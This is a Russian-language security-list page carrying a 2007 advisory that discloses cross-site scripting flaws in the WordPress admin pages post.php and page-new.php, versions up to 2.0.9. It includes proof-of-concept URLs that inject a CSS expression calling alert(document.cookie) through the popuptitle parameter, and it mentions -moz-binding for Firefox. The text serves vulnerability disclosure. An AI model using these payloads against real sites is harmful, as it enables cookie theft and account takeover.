Информационная безопасность
[RU] switch to
English Version

  

Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Logaholic Web Analytics Software

  Jupiter Cms Multiple Vulnerabilities

  [waraxe-2007-SA#060] - Sensitive info disclosure in CuteNews <= 1.4.5

  [ISecAuditors Security Advisories] Tikiwiki CMS is vulnerable to path traversal attack

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:24 декабря 2007 г.
Subject:Cross-Site Scripting vulnerabilities in WordPress

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в WordPress.

XSS:

http://site/wp-admin/post.php?popuptitle=%22%20style=%22xss:
expression(alert(document.cookie))%22

http://site/wp-admin/page-new.php?popuptitle=%22%20style=%22xss:
expression(alert(document.cookie))%22

Это примеры для Internet Explorer. Для исполнения кода в Mozilla и Firefox может быть использован "-moz-binding".

Уязвимы версии WordPress <= 2.0.9. Версия WP 2.0.11 неуязвима.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1658/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 



Rating@Mail.ru